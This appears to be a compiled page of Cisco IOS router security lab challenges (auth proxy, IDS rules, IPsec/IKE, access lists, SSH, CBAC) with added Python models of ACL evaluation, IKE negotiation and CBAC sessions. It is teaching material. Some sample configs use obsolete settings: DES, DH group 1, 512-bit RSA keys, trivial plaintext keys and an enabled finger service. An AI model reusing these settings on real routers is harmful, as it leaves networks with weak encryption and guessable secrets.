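The following Python is an added example (not part of the NetworkSims page): a small evaluator for the numbered IP access lists used in this chapter, covering the standard lists that guard the HTT P server and vty lines in Challenges 40 to 43, the wildcard-mask entries of Challenge 31 and the TCP-flag list above. It models top-down first-match evaluation, the implicit deny at the end, IOS wildcard masks, and the established and syn keywords. Its assumptions: only a handful of port names are known, eq is handled only after the destination address, log is accepted but not acted on, and the packets it is run against are constructed for the example.

```python
"""Evaluator for a subset of IOS numbered access lists. Added example,
not code from the NetworkSims page."""
import ipaddress

# Small port-name table (IOS knows many more); an assumption of this example.
PORT_NAMES = {"domain": 53, "www": 80, "telnet": 23, "smtp": 25, "ftp": 21}
ANY = ("0.0.0.0", "255.255.255.255")
TCP_FLAGS = {"syn", "ack", "rst", "fin", "psh", "urg"}


def wildcard_match(addr, base, wildcard):
    """IOS wildcard mask: a 1 bit means 'do not care' (inverse of a netmask)."""
    a = int(ipaddress.IPv4Address(addr))
    b = int(ipaddress.IPv4Address(base))
    w = int(ipaddress.IPv4Address(wildcard))
    return (a & ~w) == (b & ~w)


def _take_addr(tok):
    """Consume one address spec (any | host A | A W); returns (base, wildcard)."""
    t = tok.pop(0)
    if t == "any":
        return ANY
    if t == "host":
        return (tok.pop(0), "0.0.0.0")
    return (t, tok.pop(0))


def parse_acl(lines):
    """Parse 'access-list N permit|deny ...' lines into matcher dicts.
    Numbers 1-99 and 1300-1999 are standard lists (source address only);
    the rest are extended (protocol, source, destination, options)."""
    entries = []
    for line in lines:
        tok = line.split()
        assert tok[0] == "access-list", line
        number = int(tok[1])
        e = {"action": tok[2], "proto": "ip", "flags": set(), "dport": None}
        tok = tok[3:]
        if number <= 99 or 1300 <= number <= 1999:
            e["src"], e["dst"] = _take_addr(tok), ANY
        else:
            e["proto"] = tok.pop(0)
            e["src"] = _take_addr(tok)
            e["dst"] = _take_addr(tok)
            while tok:
                t = tok.pop(0)
                if t == "eq":                 # destination port only, here
                    p = tok.pop(0)
                    e["dport"] = PORT_NAMES.get(p) or int(p)
                elif t == "established" or t in TCP_FLAGS:
                    e["flags"].add(t)
                elif t in ("log", "log-input"):
                    e["log"] = True
        entries.append(e)
    return entries


def evaluate(entries, pkt):
    """First match wins; no match is the implicit deny. pkt has src, dst,
    proto, optional dport and an optional set of TCP flags.
    Returns (action, matching entry or None)."""
    flags = pkt.get("flags", set())
    for e in entries:
        if e["proto"] not in ("ip", pkt["proto"]):
            continue
        if not wildcard_match(pkt["src"], *e["src"]):
            continue
        if not wildcard_match(pkt["dst"], *e["dst"]):
            continue
        if e["dport"] is not None and pkt.get("dport") != e["dport"]:
            continue
        # 'established' = ACK or RST set; any other flag keyword must be set.
        if "established" in e["flags"] and not (flags & {"ack", "rst"}):
            continue
        if not (e["flags"] - {"established"}) <= flags:
            continue
        return e["action"], e
    return "deny", None


def check(acl_lines, pkt):
    """Convenience: parse and evaluate in one call, returning the action."""
    return evaluate(parse_acl(acl_lines), pkt)[0]


if __name__ == "__main__":
    syn_acl = ["access-list 107 permit tcp any any established",
               "access-list 107 deny tcp any any log"]
    probe = {"src": "8.8.8.8", "dst": "10.0.0.1", "proto": "tcp", "dport": 80}
    print("bare SYN   :", check(syn_acl, dict(probe, flags={"syn"})))
    print("SYN-ACK    :", check(syn_acl, dict(probe, flags={"syn", "ack"})))
    print("forged ACK :", check(syn_acl, dict(probe, flags={"ack"})))
```

Two results are worth noticing when it is run. A segment with only ACK set is permitted by the established entry even though no connection exists, which is the limitation the note above describes. And the entry permit tcp 243.76.220.0 255.255.0.0 ... from Challenge 31 matches a source such as 1.2.220.0 but not 243.76.1.1, because 255.255.0.0 as a wildcard ignores the first two octets rather than the last two.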

Cisco Router Challenge 54

Outline
This challenge involves the configuration of an authentication proxy.

Objectives
The objectives of this challenge are to:

Define AAA.
Setup an authentication proxy.

Example
> en
# config t
(config)# aaa new-model
(config)# ip http ?
access-class    Restrict access by access-class
authentication  Set http authentication method
path            Set base path for HTML
port            HTTP port
server          Enable HTTP server
(config)# ip http authentication ?
aaa     Use AAA access control methods
enable  Use enable passwords
local   Use local username and passwords
tacacs  Use tacacs to authorize user
(config)# ip http authentication aaa
(config)# ip auth-proxy ?
auth-cache-time    Authorization Cache Timeout in min
auth-proxy-audit   Authentication Proxy Auditing
auth-proxy-banner  Authentication Proxy Banner
name               Specify an Authentication Proxy Rule
<cr>
(config)# ip auth-proxy auth-cache-time ?
<1-35791>  Timeout in minutes
(config)# ip auth-proxy auth-cache-time 45
(config)# ip auth-proxy name yellow http
(config)# int fa0
(config-if)# ip auth-proxy ?
WORD  Name of authentication proxy rule
(config-if)# ip auth-proxy yellow
(config-if)# exit
# show ip auth-proxy configuration
Authentication global cache time is 45 minutes

Authentication Proxy Rule Configuration
Auth-proxy name yellow
http list not specified auth-cache-time 45 minutes

Note:
The proxy intercepts HTTP from hosts on fa0, serves a login page from the router's own HTTP server (so ip http server must be enabled) and checks the credentials through AAA; for that to work the router also needs an aaa authentication login and an aaa authorization auth-proxy method list pointing at a RADIUS or TACACS+ server, and the server has to return the per-user access-list entries that are opened on the interface once the user has authenticated. "list not specified" means every HTTP request on the interface triggers the proxy; adding a standard access list to the rule limits it to chosen destinations. The cache time (45 minutes here) is the inactivity period after which the entry is removed, so it is also the window in which anyone who takes over the same IP address inherits the access.

NetworkSims.com

887

Cisco Router Challenge 55


Outline
This challenge involves the configuration of IDS rules.

Objectives
The objectives of this challenge are to:

Setup IDS rules.
Define a SPAM filter.

Example
> en
# config t
(config)# ip audit ?
attack     Specify default action for attack signatures
info       Specify default action for informational signatures
name       Specify an IDS audit rule
notify     Specify the notification mechanisms (nr-director or log) for the alarms
po         Specify nr-director's PostOffice information (for sending events to the nr-directors
signature  Add a policy to a signature
smtp       Specify SMTP Mail spam threshold
(config)# ip audit notify ?
log
Send events as syslog messages
nr-director Send events to the nr-director
(config)# ip audit notify log
(config)# logging 132.191.125.3
(config)# ip audit ?
attack
Specify default action for attack signatures
info
Specify default action for informational signatures
name
Specify an IDS audit rule
notify
Specify the notification mechanisms (nr-director or log) for the
alarms
po
Specify nr-director's PostOffice information (for sending events
to the nr-directors
signature Add a policy to a signature
smtp
Specify SMTP Mail spam threshold
(config)# ip audit info ?
action Specify the actions
(config)# ip audit info action ?
alarm Generate events for matching signatures
drop
Drop packets matching signatures
reset Reset the connection (if applicable)
(config)# ip audit info action drop
(config)# ip audit attack action reset
(config)# ip audit signature ?

<1-65535> Signature to be configured
(config)# ip audit signature 1005 disable
(config)# ip audit smtp ?
spam Specify the threshold for spam signature
<cr>
(config)# ip audit smtp spam ?
<1-65535> Threshold of correspondents to trigger alarm
(config)# ip audit smtp spam 4

Cisco Router Challenge 56


Outline
This challenge involves setting up IKE for a VPN connection.

Objectives
The objectives of this challenge are to:

Define the IKE policy.
Define encryption.
Define hash function.
Define authentication type.
Define identity type.
Define authentication key and address (for pre-share authentication).
Define the transform set.

Example
> en
# config t
(config)# crypto isakmp enable
(config)# crypto isakmp policy 111
(config-isakmp)# encryption des
(config-isakmp)# hash sha
(config-isakmp)# authentication pre-share
(config-isakmp)# group 1
(config-isakmp)# exit
(config)# crypto isakmp identity hostname
(config)# crypto isakmp key test address 192.168.1.1
(config)# crypto ipsec transform-set test esp-des


Cisco Router Challenge 57


Outline
This challenge involves setting up a crypto map and applying it to an interface.

Objectives
The objectives of this challenge are to:

Define a crypto access-list, to identify the traffic to encrypt.
Define IKE.
Define a crypto map.
Bind the ACL with the crypto map.
Apply the crypto map to E0.

Example
> en
# config t
(config)# hostname newhampshire
(config)# access-list 109 permit ip 50.93.142.0 0.0.255.255
136.163.130.0 0.0.255.255
(config)# crypto isakmp enable
(config)# crypto isakmp policy 111
(config-isakmp)# encryption des
(config-isakmp)# hash sha
(config-isakmp)# authentication pre-share
(config-isakmp)# group 1
(config-isakmp)# exit
(config)# crypto isakmp identity hostname
(config)# crypto isakmp key test address 192.168.1.1
(config)# crypto ipsec transform-set finland esp-des
(config)# crypto map manchester 10 ipsec-isakmp
(config-crypto-map)# match address 109
(config-crypto-map)# set peer 144.55.62.1
(config-crypto-map)# set transform-set finland
(config-crypto-map)# exit
(config)# int e0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# no shut
(config-if)# crypto map manchester
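
The policy 111 above is configured on one peer only; IKE phase 1 only succeeds if the remote peer holds a policy with the same encryption, hash, authentication method and Diffie-Hellman group, and IOS documents that the responder checks its own policies in priority order (lowest number first) against everything the initiator offers, using the shorter of the two lifetimes. The following Python is an added example written for this page (it is not NetworkSims or Cisco code) that models that selection and flags the parameters in policy 111 that a reviewer would not accept today (DES, group 1). The second policy on each side, the peer's policy set and the priorities 5, 10 and 20 are constructed for the demonstration; the field defaults are taken from the documented IOS defaults for a new isakmp policy.

```python
from dataclasses import dataclass

# Parameters a reviewer should flag today (the page's policy 111 uses two of them).
WEAK_ENCRYPTION = {"des", "3des"}   # 56-bit key / 64-bit block (Sweet32)
WEAK_HASH = {"md5"}                 # IOS "sha" means SHA-1; only md5 is flagged here
WEAK_GROUPS = {1, 2}                # 768-bit and 1024-bit MODP Diffie-Hellman


@dataclass(frozen=True)
class IkePolicy:
    """One `crypto isakmp policy <priority>` entry. Field defaults are the
    documented IOS defaults for a newly created policy (assumption of this example)."""
    priority: int                   # lower number = higher priority, tried first
    encryption: str = "des"
    hash_alg: str = "sha"
    authentication: str = "rsa-sig"
    group: int = 1
    lifetime: int = 86400           # seconds

    def proposal(self):
        return (self.encryption, self.hash_alg, self.authentication, self.group)


def negotiate(initiator_policies, responder_policies):
    """Phase-1 selection as IOS documents it: the initiator offers all of its
    policies; the responder walks its own policies from highest priority
    (lowest number) downwards and accepts the first whose encryption, hash,
    authentication method and DH group all equal some offered policy. The
    lifetime used is the shorter of the two. Returns the agreed IkePolicy
    (carrying the responder's priority number) or None when nothing matches."""
    offered = {p.proposal(): p for p in initiator_policies}
    for mine in sorted(responder_policies, key=lambda p: p.priority):
        theirs = offered.get(mine.proposal())
        if theirs is not None:
            return IkePolicy(mine.priority, *mine.proposal(),
                             lifetime=min(mine.lifetime, theirs.lifetime))
    return None


def weaknesses(policy):
    """Defender's check of one policy against the sets above; empty list = nothing to flag."""
    findings = []
    if policy.encryption in WEAK_ENCRYPTION:
        findings.append(f"encryption {policy.encryption}")
    if policy.hash_alg in WEAK_HASH:
        findings.append(f"hash {policy.hash_alg}")
    if policy.group in WEAK_GROUPS:
        findings.append(f"group {policy.group}")
    return findings


# The policy exactly as configured on the page (router newhampshire, priority 111).
POLICY_111 = IkePolicy(111, "des", "sha", "pre-share", 1)

# Constructed for the demo: a stronger policy on each side. "aes" and group 14 are
# real IOS keywords; the priorities 5/10/20 and the peer's policy set are assumptions.
NEWHAMPSHIRE = [POLICY_111, IkePolicy(10, "aes", "sha", "pre-share", 14, lifetime=28800)]
PEER = [IkePolicy(5, "aes", "sha", "pre-share", 14), IkePolicy(20, "des", "sha", "pre-share", 1)]

if __name__ == "__main__":
    agreed = negotiate(NEWHAMPSHIRE, PEER)
    print("agreed:", agreed, "findings:", weaknesses(agreed))
    print("policy 111 findings:", weaknesses(POLICY_111))
```

Because the responder tries its own policies in priority order, the stronger policy 5 wins even though both peers also share the weak DES/group 1 policy; if the peer only had policy 20, the DES policy would be chosen, which is why the weak entries should be removed rather than merely outranked.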


Cisco Router Challenge 58


Outline
This challenge involves setting an access-list to allow IPSec.

Objectives
The objectives of this challenge are to:

Create an access-list which allows AHP, ESP and ISAKMP.
Apply the access-list.

Example
> en
# config t
(config)# hostname london
london (config)# access-list 101 permit ahp host 117.84.81.2 host 61.222.47.2
london (config)# access-list 101 permit esp host 117.84.81.2 host 61.222.47.2
london (config)# access-list 101 permit udp host 117.84.81.2 host 61.222.47.2 eq isakmp
london (config)# int e0
london (config-if)# ip address 136.22.25.1 255.252.0.0
london (config-if)# no shut
london (config-if)# ip access-group 101 in

Cisco Router Challenge 60



Outline
This challenge involves blocking SNMP.

Objectives
The objectives of this challenge are to:

Define an access-list to block SNMP.
Apply the access-list.
Disable SNMP-server commands.

Example
> en
# config t
(config)# access-list 110 deny udp any any eq snmp
(config)# int e0
(config-if)# ip access-group 110 in
(config-if)# exit
(config)# service timestamps log datetime
(config)# service sequence-numbers
(config)# service dhcp
(config)# service finger
(config)# no service tcp-small-servers
(config)# no service udp-small-servers
(config)# service password-encryption
(config)# no snmp-server community annt RO
(config)# no snmp-server contact steven
(config)# no snmp-server location uk
(config)# no snmp-server host 78.113.70.11
(config)# no snmp-server enable traps
(config)# no snmp-server chassis-ID paris
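
Challenges 53, 57, 58 and 60 all rely on IOS extended access-list semantics that the transcripts leave implicit: entries are tried top to bottom and the first match wins, wildcard masks mark the bits to ignore, `eq` takes port names, `established` matches only segments with ACK or RST set, and every list ends with an implicit `deny ip any any`. The evaluator below is an added example written for this page, not NetworkSims or Cisco code; it parses lines of the form used above and tests constructed packets against them. It makes one consequence visible: access-list 110 as written in Challenge 60, applied inbound on E0 with no permit entry, drops every packet that is not SNMP as well, so the constructed `ACL_110_WITH_PERMIT` adds the `permit ip any any` that keeps the interface usable. The packet addresses and the port-name table are constructed for the example.

```python
import ipaddress
from dataclasses import dataclass
from typing import Callable, Optional

# Port keywords used by the access-lists on this page (IOS name -> number); constructed table.
PORT_NAMES = {"isakmp": 500, "snmp": 161, "www": 80, "telnet": 23, "ssh": 22}
PROTO_NAMES = {"ip", "tcp", "udp", "icmp", "ahp", "esp"}


@dataclass
class Packet:
    proto: str
    src: str
    dst: str
    sport: int = 0
    dport: int = 0
    ack_or_rst: bool = False   # TCP ACK or RST bit set: what `established` matches


def _parse_addr(tokens):
    """Consume one IOS address spec: 'any', 'host A.B.C.D' or 'A.B.C.D wildcard'.
    Returns (matcher(ip) -> bool, remaining tokens)."""
    t = tokens[0]
    if t == "any":
        return (lambda ip: True), tokens[1:]
    if t == "host":
        target = ipaddress.ip_address(tokens[1])
        return (lambda ip: ip == target), tokens[2:]
    base = int(ipaddress.ip_address(t))
    wild = int(ipaddress.ip_address(tokens[1]))
    # Wildcard mask: a 1 bit means "don't care", so force those bits high on both sides.
    return (lambda ip: (int(ip) | wild) == (base | wild)), tokens[2:]


def _parse_port(tokens):
    """Optional 'eq <port>' qualifier. Returns (port number or None, remaining tokens)."""
    if tokens and tokens[0] == "eq":
        name = tokens[1]
        return (PORT_NAMES[name] if name in PORT_NAMES else int(name)), tokens[2:]
    return None, tokens


@dataclass
class Ace:
    action: str
    proto: str
    src: Callable
    sport: Optional[int]
    dst: Callable
    dport: Optional[int]
    established: bool
    text: str


def parse_ace(line):
    """Parse 'access-list N {permit|deny} proto src [eq p] dst [eq p] [established]'."""
    tokens = line.split()
    if tokens[0] != "access-list" or tokens[3] not in PROTO_NAMES:
        raise ValueError(f"unsupported line: {line}")
    action, proto, rest = tokens[2], tokens[3], tokens[4:]
    src, rest = _parse_addr(rest)
    sport, rest = _parse_port(rest)
    dst, rest = _parse_addr(rest)
    dport, rest = _parse_port(rest)
    return Ace(action, proto, src, sport, dst, dport, "established" in rest, line)


def evaluate(acl_lines, pkt):
    """First matching entry wins, top to bottom; a packet that matches no entry
    hits the implicit 'deny ip any any' that ends every IOS access-list."""
    s, d = ipaddress.ip_address(pkt.src), ipaddress.ip_address(pkt.dst)
    for ace in map(parse_ace, acl_lines):
        if ace.proto != "ip" and ace.proto != pkt.proto:
            continue
        if not (ace.src(s) and ace.dst(d)):
            continue
        if ace.sport is not None and ace.sport != pkt.sport:
            continue
        if ace.dport is not None and ace.dport != pkt.dport:
            continue
        if ace.established and not pkt.ack_or_rst:
            continue
        return ace.action, ace.text
    return "deny", "implicit deny ip any any"


# Access-lists as they appear on this page.
ACL_101 = [   # Challenge 58: the IPsec peer's AH, ESP and ISAKMP traffic
    "access-list 101 permit ahp host 117.84.81.2 host 61.222.47.2",
    "access-list 101 permit esp host 117.84.81.2 host 61.222.47.2",
    "access-list 101 permit udp host 117.84.81.2 host 61.222.47.2 eq isakmp",
]
ACL_110_AS_WRITTEN = ["access-list 110 deny udp any any eq snmp"]   # Challenge 60
# Hardened form (constructed): block SNMP but still let everything else through.
ACL_110_WITH_PERMIT = ACL_110_AS_WRITTEN + ["access-list 110 permit ip any any"]
```

Running `evaluate(ACL_110_AS_WRITTEN, ...)` on any non-SNMP packet returns the implicit deny, which on a real router shows up as an interface that passes nothing after the `ip access-group 110 in`; `ACL_110_WITH_PERMIT` is what the objective "Define an access-list to block SNMP" needs in practice.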

Cisco Router Challenge 61


Outline
This challenge involves manually configuring RSA keys for peers.


Objectives
The objectives of this challenge are to:

Define the public key for a given host.
Specify the key.

Example
> en
# config t
(config)# crypto key pubkey-chain rsa
(config-pubkey-chain)# addressed-key 142.217.4.10
(config-pubkey-key)# key-string 01234567 01234567
(config-pubkey-key)# key-string 01234567 01234567
(config-pubkey-key)# key-string 01234567 01234567
(config-pubkey-key)# key-string 01234567 01234567
(config-pubkey-key)# key-string 01234567 01234567
(config-pubkey-key)# key-string 01234567 01234567
(config-pubkey-key)# key-string 01234567 01234567
(config-pubkey-key)# exit
(config-pubkey-chain)# exit
(config)# exit
# show crypto key pubkey rsa
01234567 01234567
01234567 01234567
01234567 01234567
01234567 01234567
01234567 01234567
01234567 01234567
01234567 0123

Cisco Router Challenge 62


Outline
This challenge involves the setup of authenticated routing protocols.

Objectives
The objectives of this challenge are to:

Define EIGRP.
Apply MD5 authentication on an interface.
Define the authentication key chain.

Example
# config t
(config)# router eigrp 142
(config-router)# network 205.104.0.0
(config-router)# int s0
(config-if)# ip address 205.118.116.6 255.255.255.224
(config-if)# ip authentication mode eigrp 142 md5
(config-if)# ip authentication key-chain eigrp 142 ann
(config-if)# exit
(config)# key chain ann
(config-keychain)# key 1
(config-keychain-key)# key-string hotel
(config-keychain-key)# exit

Router Challenge 124: SSH Explained


Outline: This challenge involves an analysis of SSH.
Objectives: The objectives of this challenge are to explain SSH.
Explanation
The TELNET protocol is insecure, as the text is passed as plain text. An improved method is
to use SSH, which encrypts data. It requires that a domain name and an RSA key pair be defined:
ap# config t
Enter configuration commands, one per line. End with CNTL/Z.
ap(config)# ip domain-name test.com
ap(config)# crypto key generate rsa
How many bits in the modulus [512]:
% Generating 512 bit RSA keys ...[OK]

To view the public key:
ap#show crypto key mypubkey rsa
% Key pair was generated at: 00:42:19 UTC Mar 1 2002
Key name: ap.test.com
Usage: General Purpose Key
Key is not exportable.
Key Data:
305C300D 06092A86 4886F70D 01010105 00034B00 30480241 00DDD8C6 4B744520
F1499B01 49C485A2 20C9FB37 8CD11053 039D344B 3C5BD55E E84E17C8 FD62DA08
32020F80 910AFBCC 6D402F90 96E8A59B 40467A3E 8FEED18B B1020301 0001
% Key pair was generated at: 00:42:21 UTC Mar 1 2002
Key name: ap.test.com.server
Usage: Encryption Key
Key is not exportable.
Key Data:
307C300D 06092A86 4886F70D 01010105 00036B00 30680261 00B435A4 C007251B
312319CA 0E919F76 72D2D5A9 36B4710C CC4DE0C4 080D2B47 55970CA5 39F21170
D07C0000 832F6A1C 81411423 BE52CBF4 ECBE417E 1C3C09D1 2BBC90DF 8DA398DB
AE8EFA46 282AEC54 F0909F82 466A19DD EBEFAEDE 7B4B992F 5F020301 0001

An SSH client such as putty can then be used to connect to the access point:
... graphic missed out on version see help file.
after which the client shows the message:
... graphic missed out on version see help file.

and the SSH connection is made, such as:


... graphic missed out on version see help file.
To get rid of keys:
ap(config)# crypto key zero

and to set the timeout and authentication retries:


ap(config)# ip ssh time-out 60
ap(config)# ip ssh authentication-retries 2

which sets the timeout to 60 seconds, and a maximum of two retries. Finally, to prevent
Telnet sessions:
ap(config)#line vty 0 4
ap(config-line)# transport input ssh

Cisco Router Challenge 128


Outline
This challenge involves configuring TCP intercept.
Objectives
The objectives of this challenge are to:

Define a host to intercept.
Enable intercept.

Example
> enable
# config t
(config)# access-list 150 permit tcp any host 172.10.1.1
(config)# ip tcp intercept list 150
(config)# ip tcp intercept mode intercept

Cisco Router Challenge 125


Outline
This challenge involves defining protocols that should be inspected.
Objectives
The objectives of this challenge are to:

Define the name of the inspection.
Apply it on a port.

Example
> enable
# config t
(config)# ip inspect ?
L2-transparent Transparent Mode commands
alert-off
Disable alert
audit-trail
Enable the logging of session information (addresses and
bytes)
dns-timeout
Specify timeout for DNS
hashtable-size Specify size of hashtable
max-incomplete Specify maximum number of incomplete connections before
clamping
name
Specify an inspection rule
one-minute
Specify one-minute-sample watermarks for clamping
tcp
Config timeout values for tcp connections
udp
Config timeout values for udp flows
<cr>
(config)# ip inspect name ?
WORD Name of inspection defined
(config)# ip inspect name test ?
cuseeme
CUSeeMe Protocol
esmtp
Extended SMTP
fragment
IP fragment inspection
ftp
File Transfer Protocol
h323
H.323 Protocol (e.g, MS NetMeeting, Intel Video Phone)
http
HTTP Protocol
icmp
ICMP Protocol
netshow
Microsoft NetShow Protocol
rcmd
R commands (r-exec, r-login, r-sh)
realaudio
Real Audio Protocol
rpc
Remote Prodedure Call Protocol
rtsp
Real Time Streaming Protocol
sip
SIP Protocol
skinny
Skinny Client Control Protocol
smtp
Simple Mail Transfer Protocol
sqlnet
SQL Net Protocol
streamworks StreamWorks Protocol
tcp
Transmission Control Protocol
tftp
TFTP Protocol
udp
User Datagram Protocol
vdolive
VDOLive Protocol
(config)# ip inspect name test ftp
(config)# ip inspect name test h323
(config)# ip inspect name test http
(config)# int e0
(config-if)# ip inspect ?
WORD Name of inspection defined
(config-if)# ip inspect test in
(config-if)# int e1
(config-if)# ip inspect ?
WORD Name of inspection defined
(config-if)# ip inspect test out

Explanation
Inspection rules are used to define the traffic types and applications that are to be inspected.
First the applications to be monitored are defined, such as:
(config)#ip inspect name BILLS ?
cuseeme
CUSeeMe Protocol
fragment
IP fragment inspection
ftp
File Transfer Protocol
h323
H.323 Protocol (e.g, MS NetMeeting, Intel Video Phone)
http
HTTP Protocol
netshow
Microsoft NetShow Protocol
rcmd
R commands (r-exec, r-login, r-sh)
realaudio
Real Audio Protocol
rpc
Remote Prodedure Call Protocol
rtsp
Real Time Streaming Protocol
smtp
Simple Mail Transfer Protocol
sqlnet
SQL Net Protocol
streamworks StreamWorks Protocol
tcp
Transmission Control Protocol
tftp
TFTP Protocol
udp
User Datagram Protocol
vdolive
VDOLive Protocol

such as for HTTP, FTP and TCP:
(config)# ip inspect name BILLS http
(config)# ip inspect name BILLS ftp
(config)# ip inspect name BILLS tcp
(config)# exit
#show ip inspect all
Session audit trail is disabled
Session alert is enabled
one-minute (sampling period) thresholds are [400:500] connections
max-incomplete sessions thresholds are [400:500]
max-incomplete tcp connections per host is 50. Block-time 0 minute.
tcp synwait-time is 30 sec -- tcp finwait-time is 5 sec
tcp idle-time is 3600 sec -- udp idle-time is 30 sec
dns-timeout is 5 sec
Inspection Rule Configuration
Inspection name BILLS
http alert is on audit-trail is off timeout 3600
ftp alert is on audit-trail is off timeout 3600
tcp alert is on audit-trail is off timeout 3600

Note that the name of the rule is case sensitive, such as:
#show ip inspect name bills
%Inspect name bills is not defined
# show ip inspect name BILLS
Inspection name BILLS
http alert is on audit-trail is off timeout 3600
ftp alert is on audit-trail is off timeout 3600
tcp alert is on audit-trail is off timeout 3600
(config)# ip inspect audit-trail
Inspection name BILLS
http alert is on audit-trail is on timeout 3600
ftp alert is on audit-trail is on timeout 3600
tcp alert is on audit-trail is on timeout 3600

18.1.1 Applying an Inspection Rule to an interface

CBACs are used along with ACLs, as the CBAC modifies the ACL in order that it operates
correctly. An inspection rule is applied in a similar way to an ACL, such as:
(config)# access-list 101 permit ip 10.0.0.1 0.0.0.255 any
(config)# access-list 101 deny ip any any
(config)#int fa0
(config-if)#ip inspect ?
WORD Name of inspection defined
(config-if)#ip inspect BILLS ?
in   Inbound inspection
out  Outbound inspection
(config-if)#ip inspect BILLS in
(config-if)#ip access-group 101 in

and:
(config)# access-list 102 permit tcp any host 10.0.0.1 eq www
(config)# access-list 102 deny ip any any
(config)#int s0
(config-if)#ip access-group 102 in

(Notice that no traffic is allowed on the incoming port; the CBAC fixes this.)

which applies the BILLS inspection rule to the FA0 interface in the incoming direction.
Thus when a host on the network connected to the FA0 interface initiates a connection
with a remote Web server, the inspection rule kicks in and modifies ACL number 102 to
allow the conversation between the hosts. If there were no inspection rule, the reply would be
blocked. If a host from outside the network (connected to S0) tries to connect to a node
inside the network without the connection first having been initiated from inside, its traffic
is blocked, as the CBAC has no record of a connection.
To test a CBAC:
#sh ip inspect config
Session audit trail is enabled
Session alert is enabled
one-minute (sampling period) thresholds are [400:500] connections
max-incomplete sessions thresholds are [400:500]
max-incomplete tcp connections per host is 50. Block-time 0 minute.
tcp synwait-time is 30 sec -- tcp finwait-time is 5 sec
tcp idle-time is 3600 sec -- udp idle-time is 30 sec
dns-timeout is 5 sec
Inspection Rule Configuration
Inspection name BILLS
http alert is on audit-trail is on timeout 3600
ftp alert is on audit-trail is on timeout 3600
tcp alert is on audit-trail is on timeout 3600

and on the interface:


#sh ip inspect interface
Interface Configuration
Interface FastEthernet0
Inbound inspection rule is BILLS
http alert is on audit-trail is on timeout 3600
ftp alert is on audit-trail is on timeout 3600
tcp alert is on audit-trail is on timeout 3600
Outgoing inspection rule is not set
Inbound access list is 101
Outgoing access list is not set
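
The explanation above describes CBAC as a dynamic modification of the inbound ACL: an outbound connection through the inspected interface creates a session entry, replies that match it are let in even though the static ACL on S0 would deny them, unsolicited traffic from outside still meets only the static ACL, and entries age out after the idle timer (3600 seconds for TCP in the `show ip inspect config` output above). The following toy model is an added example written for this page, not IOS code; the addresses 203.0.113.10 and 198.51.100.7, the port numbers and the packet sequence in `walkthrough()` are constructed.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    proto: str
    src: str
    sport: int
    dst: str
    dport: int

    def reverse(self):
        """The 5-tuple that reply packets for this flow carry."""
        return Flow(self.proto, self.dst, self.dport, self.src, self.sport)


class Cbac:
    """Toy model of one inspection rule. Sessions are created by traffic that
    enters the inside interface (like `ip inspect BILLS in` on FA0) for the
    inspected protocols; packets arriving on the outside interface are let
    through if they belong to a live session, otherwise they are judged by the
    static inbound ACL on that interface (like access-list 102 on S0)."""

    def __init__(self, inspected_protocols, outside_acl, idle_timeout=3600):
        self.inspected = set(inspected_protocols)
        self.outside_acl = outside_acl       # callable(Flow) -> bool, the static ACL
        self.idle_timeout = idle_timeout     # the page's `tcp idle-time is 3600 sec`
        self.sessions = {}                   # Flow as sent by the inside host -> last seen

    def inside_to_outside(self, flow, now):
        """Outbound packet from an inside host: record or refresh a session entry."""
        if flow.proto in self.inspected:
            self.sessions[flow] = now
        return "forward"

    def outside_to_inside(self, flow, now):
        """Inbound packet from outside: a live session entry beats the static ACL."""
        origin = flow.reverse()
        last_seen = self.sessions.get(origin)
        if last_seen is not None:
            if now - last_seen <= self.idle_timeout:
                self.sessions[origin] = now
                return "permit (session)"
            del self.sessions[origin]        # idle too long: the entry has aged out
        return "permit (acl)" if self.outside_acl(flow) else "deny"


def acl_102(flow):
    """Static ACL 102 from the page: only Web traffic to the server 10.0.0.1 is allowed in."""
    return flow.proto == "tcp" and flow.dst == "10.0.0.1" and flow.dport == 80


def walkthrough():
    """Constructed packet sequence; returns the firewall's decisions in order."""
    fw = Cbac({"tcp", "http", "ftp"}, acl_102)
    client_to_web = Flow("tcp", "10.0.0.5", 40000, "203.0.113.10", 80)
    reply = client_to_web.reverse()
    return [
        fw.inside_to_outside(client_to_web, now=0),                                        # SYN out: session created
        fw.outside_to_inside(reply, now=1),                                                # SYN/ACK back: session match
        fw.outside_to_inside(Flow("tcp", "203.0.113.10", 5555, "10.0.0.5", 22), now=2),   # unsolicited: ACL 102 denies
        fw.outside_to_inside(Flow("tcp", "198.51.100.7", 5555, "10.0.0.1", 80), now=3),   # static permit in ACL 102
        fw.outside_to_inside(reply, now=1 + 3601),                                         # idle timer expired
    ]


if __name__ == "__main__":
    for decision in walkthrough():
        print(decision)
```

The last step is the one worth noticing when tuning `ip inspect tcp idle-time`: once the entry has aged out, a late reply is judged by the static ACL alone and is dropped, exactly as the text says happens to any outside host with no recorded connection.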

Cisco Router Challenge 126


Outline
This challenge involves defining protocols that should be inspected.
Objectives
The objectives of this challenge are to:

Define minimum password lengths.
Define services.

Example
> en
# config t
(config)# security ?
authentication Authentication security CLIs
passwords
Password security CLIs
(config)# security passwords ?
min-length Minimum length of passwords
(config)# security passwords min ?
<0-16> Minimum length of all user/enable passwords
(config)# service ?
compress-config
Compress the configuration file
config
TFTP load config files
dhcp
Enable DHCP server and relay agent
disable-ip-fast-frag
Disable IP particle-based fast fragmentation
exec-callback
Enable exec callback
exec-wait
Delay EXEC startup on noisy lines
finger
Allow responses to finger requests
hide-telnet-addresses Hide destination addresses in telnet command
linenumber
enable line number banner for each exec
nagle
Enable Nagle's congestion control algorithm
old-slip-prompts
Allow old scripts to operate with slip/ppp
pad
Enable PAD commands
password-encryption
Encrypt system passwords
prompt
Enable mode specific prompt
pt-vty-logging
Log significant VTY-Async events
sequence-numbers
Stamp logger messages with a sequence number
slave-log
Enable log capability of slave IPs
tcp-keepalives-in
Generate keepalives on idle incoming network
connections
tcp-keepalives-out
Generate keepalives on idle outgoing network
connections
tcp-small-servers
Enable small TCP servers (e.g., ECHO)
telnet-zeroidle
Set TCP window 0 when connection is idle
timestamps
Timestamp debug/log messages
udp-small-servers
Enable small UDP servers (e.g., ECHO)
(config)# service timestamps ?
debug Timestamp debug messages
log
Timestamp log messages
<cr>
(config)# service timestamps log ?
datetime Timestamp with date and time
uptime
Timestamp with system uptime
<cr>
(config)# service timestamps log datetime
(config)# sequence-numbers ?
compress-config
Compress the configuration file
config
TFTP load config files
dhcp
Enable DHCP server and relay agent
disable-ip-fast-frag
Disable IP particle-based fast fragmentation
exec-callback
Enable exec callback
exec-wait
